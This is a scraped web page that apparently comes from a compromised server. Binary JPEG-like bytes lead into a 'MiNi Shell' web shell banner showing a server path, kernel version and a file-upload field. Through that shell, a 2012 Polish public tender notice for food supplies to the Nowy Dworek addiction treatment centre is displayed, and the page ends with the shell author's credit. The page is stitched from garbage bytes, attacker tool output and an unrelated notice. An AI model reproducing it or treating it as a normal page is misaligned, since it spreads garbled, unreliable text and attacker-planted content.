JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121105/431720-N-2012.html

<p class="kh_header"><b>Nowy Dworek: Dostawa produktów ogólnospożywczych</b><br>
<b>Numer ogłoszenia: 431720 - 2012; data zamieszczenia: 05.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek dla Osób Uzależnionych SPZOZ "Nowy Dworek" , Nowy Dworek 46, 66-200 Nowy Dworek, woj. lubuskie, tel. 68 381 10 91, 68 381 01 67, faks 68 381 01 67 wew. 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowydworek.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów ogólnospożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> L.p.	Nazwa towaru	j.m.	Przewidywana ilość
Na 2013r.
1.		Bazylia pet. 300g	Szt.	10
2.		Budyń śmietankowy 40g	Szt.	50
3.		Budyń śmietankowy pet. 1250g	Szt.	140
4.		Kakao 100g	Szt.	450
5.		Wafle ryżowe	Szt.	80
6.		Chrzan 900 g	Szt.	20
7.		Cukier  1kg	Szt.	3580
8.		Cukier waniliowy pet.1500g	Szt.	20
9.		Curry pet. 1000g	Szt.	4
10.		Cynamon 500g	Szt.	2
11.		Ćwikła z chrzanem 300g	Szt.	20
12.		Dżem 25g	Szt.	750
13.		Dżem 320g	Szt.	220
14.		Dżem 1250g	Szt.	310
15.		Fasola Jaś 5kg	Szt.	120
16.		Gałka muszkatołowa 1000g	Szt.	 2
17.		Groszek konserwowy 2,6 kg	Szt.	50
18.		Groch cały 5 kg	Szt.	10
19.		Groch łuskany 5 kg	Szt.	50
20.		Groszek konserwowy 400g	Szt.	400
21.		Herbata granulowana 100g	Szt.	1200
22.		Kasza jęczmienna 1 kg	Szt.	680
23.		Kasza manna 400g	Szt.	430
24.		Ketchup 500g - tuba	Szt.	120
25.		Kotlety sojowe 100g	Szt.	100
26.		Krem czekoladowy 200g	Szt.	200
27.		Krem czekoladowy 400g	Szt.	1100
28.		Ketchup 1kg	Szt.	180
29.		Kukurydza konserwowa 400g	Szt.	330
30.		Kukurydza 2,6 kg	Szt.	10
31.		Kwasek cytrynowy pet.1500g	Szt.	15
32.		Zioła prowansalskie 280g	Szt.	2
33.		Ziele angielskie pet. 700g	Szt.	20
34.		Kminek 1 kg	Szt.	2
35.		Liść laurowy pet. 150g	Szt.	35
36.		Chilli pet. 1000g	Szt.	4
37.		Majeranek pet. 240 g	Szt.	30
38.		Czosnek granulowany pet. 1200g	Szt.	40
39.		Wiórki kokosowe pet. 700g	Szt.	3
40.		Majonez 250g	Szt.	220
41.		Majonez 850g	Szt.	600
42.		Mąka 1kg	Szt.	700
43.		Mąka tortowa 1kg	Szt.	50
44.		Makaron świderki 1 kg	Szt.	1800
45.		Makaron spaghetti 5kg	Szt.	90
46.		Marmolada 1150g	Szt.	350
47.		Marmolada 320g	Szt.	150
48.		Mąka ziemniaczana 1 kg	Szt.	20
49.		Musztarda 500g 	Szt.	110
50.		Musztarda 1000g	Szt.	250
51.		Olej roślinny 1 L	Szt.	30
52.		Olej roślinny 5L	Szt.	250
53.		Oregano pet. 400g	Szt.	4
54.		Papryka ostra pet. 1,2kg	Szt.	10
55.		Papryka słodka pet. 1,2 kg	Szt.	18
56.		Pasztet drobiowy 130g	Szt.	300
57.		Pieprz czarny mielony pet. 1200g	Szt.	40
58.		Płatki kukurydziane 1 kg	Szt.	380
59.		Proszek do pieczenia 30g	Szt.	40
60.		Przyprawa do zup w płynie 5L	Szt.	55
61.		Przyprawa do bigosu 20 g	Szt.	50
62.		Ryż 1 kg	Szt.	3300
63.		Sok malinowy 5L-6,5 kg	Szt.	120
64.		Sok malinowy 500 ml	Szt.	1600
65.		Sos pieczeniowy 2,5 kg ciemny	Szt.	10
66.		Sos holenderski 2,5 kg	Szt.	5
67.		Sos napoli 2,5 kg	Szt.	5
68.		Sól jodowana 1 kg	Szt.	400
69.		Sól peklowa 1kg	Szt.	10
70.		Szczaw konserwowy 900g	Szt.	330
71.		Koktajl owocowy 850g	Szt.	150
72.		Barszcz biały 5 kg	Szt.	20
73.		Zupa pieczarkowa 2,5
 kg	Szt.	10
74.		Żurek 5kg	Szt.	5
75.		Dżem 1150g	Szt.	180
76.		Konserwa mięsna 300g	Szt.	800
77.		Koncentrat pomidorowy 4,5 kg	Szt.	140
78.		Koncentrat pomidorowy 0,9kg	Szt.	50
79.		Makaron łazanki 5 kg	Szt.	60
80.		Koktajl owocowy 3,1 kg	Szt.	60
81.		Ocet 500ml	Szt.
	140
82.		Cebula smażona pet. 800g 	Szt.
	5
83.		Barszcz biały 2,50kg	Szt.	10
84.		Czosnek mielony pet. 1100g	Szt.	4
85.		Koperek pet. 300g.	Szt.	4
86.		Natka pietruszki pet.120g	Szt.	10
87.		Pomidory suszone z ziołami i czosnkiem pet. 750g	Szt.	2
88.		Mieszanka warzywna /wiaderko 5 kg.	Szt.	50
89.		Przyprawa do mięsa WP./ pet. 1000g	Szt.	2
90.		Sucharki 225g	Szt.	50


Gramatura produktów asortymentowych musi być zgodna z SIWZ. Zamawiający nie dopuszcza innej gramatury.


Dostawy będą realizowane sukcesywnie, według zamówień częściowych składanych przez Zamawiającego telefonicznie, faxem lub drogą e-mailową raz w tygodniu, w dniu i o godzinie wskazanej przez Zamawiającego tj. każdy czwartek tygodnia do godz. 10.00 ,( z możliwością zmiany terminu przez Zamawiającego), z zapewnieniem dostaw  na dni świąteczne. Dostawa artykułów będących przedmiotem umowy będzie dokonywana transportem dostawcy.  Koszt transportu wliczony jest w cenę towaru.
Miejscem dostawy przedmiotu umowy  jest  siedziba Zamawiającego , tj. Nowy Dworek 46,   Jordanowo 53, Glińsk 36, oraz Świebodzin - ul.Mała 5. 
Odbioru kolejnych dostaw wymienionych w umowie , dokona upoważniony przedstawiciel Zamawiającego w miejscu

UWAGA: użyte przez zamawiającego  nazwy produktów oznaczają nazwy rodzajowe a nie nazwy konkretnych produktów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu
warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu
warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu
warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu
warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu
warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>B. zmiana terminów płatności w przypadku zmian w terminach finansowania świadczeń przez Narodowy Fundusz Zdrowia,
C. zmiana wielkości przedmiotu umowy  nie więcej jednak niż 15%, w przypadku zmniejszenia kontraktu zawartego z Narodowym Funduszem Zdrowia  i tym samym  zmniejszenia  ilości udzielanych świadczeń (wykonawca zagwarantuje zmniejszenie lub zwiększenie ilości i częstotliwości dostaw w stosunku do wcześniej złożonych zamówień w przypadkach, których nie można było przewidzieć w dniu zawarcia umowy np. niemożliwe do przewidzenia nagłe zmniejszenie lub zwiększenie stanu osobowego leczonych),
D. wypowiedzenie umowy w przypadku wystąpienia nadzwyczajnych okoliczności  np. klęska żywiołowa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowydworek.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek dla Osób Uzależnionych Samodzielny Publiczny Zakład Opieki Zdrowotnej
Nowy Dworek
Nowy Dworek 46
66-200 Świebodzin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2012 godzina 09:30, miejsce: Ośrodek dla Osób Uzależnionych Samodzielny Publiczny Zakład Opieki Zdrowotnej
Nowy Dworek
Nowy Dworek 46
66-200 Świebodzin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com